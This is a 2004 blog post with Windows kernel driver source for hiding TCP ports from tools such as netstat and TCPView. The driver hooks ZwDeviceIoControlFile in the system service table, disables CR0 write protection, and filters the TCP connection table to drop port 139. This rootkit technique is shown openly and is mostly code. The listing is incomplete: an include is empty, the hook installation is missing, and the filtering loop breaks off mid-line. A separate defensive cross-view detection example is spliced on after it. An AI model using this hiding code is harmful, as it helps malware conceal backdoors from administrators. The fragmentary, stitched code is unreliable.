Author: JIURL Home: http://jiurl.yeah.net Date: 2004-03-30
Sometimes writing and debugging programs is really a lot of fun, and this was one of those times. NetStat and the other port-listing tools, such as fport or Sysinternals TCPView, all call the APIs in iphlpapi.dll to enumerate ports. The APIs in iphlpapi.dll ultimately call ZwDeviceIoControlFile, sending IOCTL_TCP_QUERY_INFORMATION_EX to the device object \Device\Tcp to obtain the various pieces of information. So all we need to do is hook the corresponding system service and do some processing on the result, dropping the port entries we do not want to appear. The real problem, however, is that IOCTL_TCP_QUERY_INFORMATION_EX, the port-related structure definitions and the meanings of the parameters are (mostly) not public; nobody knows them, that is, they are undocumented. Undocumented?? Ring 3 debugging, I know well. Ring 0 debugging, I know well. Windows drivers, I know well. Windows internals, I know well. Who am I afraid of? Undocumented?? Cool, so it is undocumented. By debugging in ring 3 and analyzing how iphlpapi.dll uses the parameters related to IOCTL_TCP_QUERY_INFORMATION_EX, combined with some information from MSDN, it was easy to work out the structures that needed to be understood. I used my own AppWizard to build a VC driver project and wrote the hook part. As for the hooking method used in this example, it has quite a few places that can go wrong when run under different Windows versions; I do not know who thought of it first, I first saw the method in the source code of the book "Undocumented Windows". Here is the source code; it is very simple, so I will not say more about it.
#if 0
==========================================================================
CopyRight (c) jiurl, all rights reserved
==========================================================================
Module name: jiurl_tcpioctl.h
About:
  - This driver was created by an AppWizard I wrote.
  [HomePage] http://jiurl.yeah.net
  [Forum]    http://jiurl.cosoft.org.cn/forum/index.php
  - To customize the AppWizard, please contact me by email.
Comments: Nothing in this file is publicly documented; I obtained it by analysis.
It is the key to hiding ports. Undocumented?? Cool! It is undocumented.
==========================================================================
#endif

// jiurl
// The IPSNMPInfo structure definition is based on RFC 2011, so I imitated
// IPSNMPInfo and defined the TCPSNMPInfo structure according to RFC 2022,
// then extended it with some definitions obtained through analysis.
typedef struct TCPSNMPInfo {
    ULONG tcpsi_RtoAlgorithm;
    ULONG tcpsi_RtoMin;
    ULONG tcpsi_RtoMax;
    ULONG tcpsi_MaxConn;
    ULONG tcpsi_ActiveOpens;
    ULONG tcpsi_PassiveOpens;
    ULONG tcpsi_AttemptFails;
    ULONG tcpsi_EstabResets;
    ULONG tcpsi_CurrEstab;
    ULONG tcpsi_InSegs;
    ULONG tcpsi_OutSegs;
    ULONG tcpsi_RetransSegs;
    ULONG tcpsi_unknown1;
    ULONG tcpsi_unknown2;
    ULONG tcpsi_numconn;
} TCPSNMPInfo;

#define tcpRtoAlgorithm_other    1 // none of the following
#define tcpRtoAlgorithm_constant 2 // a constant rto
#define tcpRtoAlgorithm_rsre     3 // MIL-STD-1778, Appendix B
#define tcpRtoAlgorithm_vanj     4 // Van Jacobson's algorithm

#define TCP_MIB_STATS_ID              1
#define TCP_MIB_ADDRTABLE_ENTRY_ID    0x101
#define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102

typedef struct TCPAddrEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
} TCPAddrEntry;

#define tcpConnState_closed       1
#define tcpConnState_listen       2
#define tcpConnState_synSent      3
#define tcpConnState_synReceived  4
#define tcpConnState_established  5
#define tcpConnState_finWait1     6
#define tcpConnState_finWait2     7
#define tcpConnState_closeWait    8
#define tcpConnState_lastAck      9
#define tcpConnState_closing      10
#define tcpConnState_timeWait     11
#define tcpConnState_deleteTCB    12

typedef struct TCPAddrExEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
    ULONG pid;
} TCPAddrExEntry;

#if 0
==========================================================================
CopyRight (c) JIURL, All rights reserved
==========================================================================
Module name: jiurlporthide.h
About:
  - This driver was created by an AppWizard I wrote.
  [HomePage] http://jiurl.yeah.net
  [Forum]    http://jiurl.cosoft.org.cn/forum/index.php
  - To customize the AppWizard, please contact me by email.
==========================================================================
#endif

#define PORTHIDE 139

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int  *ServiceTableBase;
    unsigned int  *ServiceCounterTableBase; // Used only in checked build
    unsigned int   NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength);

typedef NTSTATUS (*ZWDEVICEIOCONTROLFILE)(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength);

ZWDEVICEIOCONTROLFILE OldZwDeviceIoControlFile;

void DriverUnload(IN PDRIVER_OBJECT DriverObject);

NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);

NTSTATUS NewZwDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength);

// jiurl
// from addrconv.cpp
#define NTOHS(s) \
    ((((s) >> 8) & 0x00FF) | \
     (((s) << 8) & 0xFF00))

// jiurl
// from tcpioctl.h tdiinfo.h tdistat.h
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003

//
// Structure of an entity ID.
//
typedef struct TDIEntityID {
    ULONG tei_entity;
    ULONG tei_instance;
} TDIEntityID;

//
// Structure of an object ID.
//
typedef struct TDIObjectID {
    TDIEntityID toi_entity;
    ULONG       toi_class;
    ULONG       toi_type;
    ULONG       toi_id;
} TDIObjectID;

#define CONTEXT_SIZE 16

//
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer
// in the DeviceIoControl request. This structure is passed as the
// InputBuffer.
//
struct tcp_request_query_information_ex {
    TDIObjectID ID;                                       // object ID to query.
    ULONG_PTR   context[CONTEXT_SIZE / sizeof(ULONG_PTR)]; // multi-request context. Zeroed
                                                           // for the first request.
};

typedef struct tcp_request_query_information_ex TCP_REQUEST_QUERY_INFORMATION_EX,
    *PTCP_REQUEST_QUERY_INFORMATION_EX;

#define CO_TL_ENTITY        0x400
#define INFO_CLASS_PROTOCOL 0x200
#define INFO_TYPE_PROVIDER  0x100

#if 0
==========================================================================
CopyRight (c) jiurl, all rights reserved
==========================================================================
Module name: jiurlporthide.cpp
About:
  - This driver was created by an AppWizard I wrote.
  [HomePage] http://jiurl.yeah.net
  [Forum]    http://jiurl.cosoft.org.cn/forum/index.php
  - To customize the AppWizard, please contact me by email.
==========================================================================
#endif

#ifdef __cplusplus
extern "C" {
#endif
#include

    _asm {
        MOV EAX, CR0     // move CR0 register into EAX
        OR  EAX, 10000H  // enable WP bit
        MOV CR0, EAX     // write register back
        STI              // enable interrupts
    }
}

NTSTATUS NewZwDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength)
{
    NTSTATUS rc;

    // Let the original service complete the request first, then inspect the result.
    rc = ((ZWDEVICEIOCONTROLFILE)(OldZwDeviceIoControlFile))(
        FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock,
        IoControlCode, InputBuffer, InputBufferLength,
        OutputBuffer, OutputBufferLength);

    if (IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX) {
        return rc;
    }

    TCP_REQUEST_QUERY_INFORMATION_EX req;
    TCPAddrEntry   *TcpTable;
    TCPAddrExEntry *TcpExTable;
    ULONG numconn;
    LONG  i;

    DbgPrint("jiurlporthide: IOCTL_TCP_QUERY_INFORMATION_EX\n");

    if (NT_SUCCESS(rc)) {
        // Build the object ID of the TCP connection table and compare it with
        // the one the caller passed in the InputBuffer.
        req.ID.toi_entity.tei_entity   = CO_TL_ENTITY;
        req.ID.toi_entity.tei_instance = 0;
        req.ID.toi_class = INFO_CLASS_PROTOCOL;
        req.ID.toi_type  = INFO_TYPE_PROVIDER;
        req.ID.toi_id    = TCP_MIB_ADDRTABLE_ENTRY_ID;

        if (!memcmp(InputBuffer, &req, sizeof(TDIObjectID))) {
            numconn  = IoStatusBlock->Information / sizeof(TCPAddrEntry);
            TcpTable = (TCPAddrEntry *)OutputBuffer;
            for (i = 0; i
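A defender's counterpart to the filtering described above, as an added example in C that is not the author's driver code: it reads rows in the TCPAddrEntry layout the page defines and runs a cross-view comparison against an independently obtained list of listening ports, so a row removed by a hooked ZwDeviceIoControlFile shows up as a discrepancy. The sample table and scan list are constructed, and unsigned int stands in for ULONG so it builds without the Windows headers.

```c
#include <stddef.h>

/* One row of the TCP_MIB_ADDRTABLE_ENTRY_ID table, laid out like the page's TCPAddrEntry
   (unsigned int stands in for ULONG). The port fields hold network byte order. */
typedef struct {
    unsigned int tae_ConnState;
    unsigned int tae_ConnLocalAddress;
    unsigned int tae_ConnLocalPort;
    unsigned int tae_ConnRemAddress;
    unsigned int tae_ConnRemPort;
} TCPAddrEntry;

#define tcpConnState_listen 2
#define NTOHS(s) ((unsigned short)((((s) >> 8) & 0x00FF) | (((s) << 8) & 0xFF00)))
/* Host-order local port of a row, using the same byte swap as the driver's NTOHS. */
unsigned short entry_local_port(const TCPAddrEntry *e) { return NTOHS(e->tae_ConnLocalPort); }

/* Cross-view check: each port in the reference list (assumed to come from an independent
   source such as a scan from another host) with no listening row in the IOCTL view goes
   into hidden[]; returns how many were found. */
size_t find_hidden_ports(const TCPAddrEntry *ioctl_view, size_t n_ioctl,
                         const unsigned short *reference, size_t n_ref,
                         unsigned short *hidden, size_t max_hidden)
{
    size_t count = 0;
    for (size_t r = 0; r < n_ref; r++) {
        int seen = 0;
        for (size_t i = 0; i < n_ioctl && !seen; i++)
            seen = ioctl_view[i].tae_ConnState == tcpConnState_listen &&
                   entry_local_port(&ioctl_view[i]) == reference[r];
        if (!seen && count < max_hidden)
            hidden[count++] = reference[r];
    }
    return count;
}

/* Constructed sample: the table a hooked driver would return after dropping port 139 (the
   page's PORTHIDE); 0x8700 and 0xBD01 are ports 135 and 445 as a little-endian host reads
   the network-order bytes. */
const TCPAddrEntry sample_view[] = {
    { tcpConnState_listen, 0, 0x8700, 0, 0 },
    { tcpConnState_listen, 0, 0xBD01, 0, 0 },
};
const unsigned short scan_reference[] = { 135, 139, 445 }; /* constructed scan result */

/* Runs the check on the sample; returns the first hidden port, or 0 if none. */
unsigned short sample_first_hidden(void)
{
    unsigned short hidden[8];
    return find_hidden_ports(sample_view, 2, scan_reference, 3, hidden, 8) ? hidden[0] : 0;
}
```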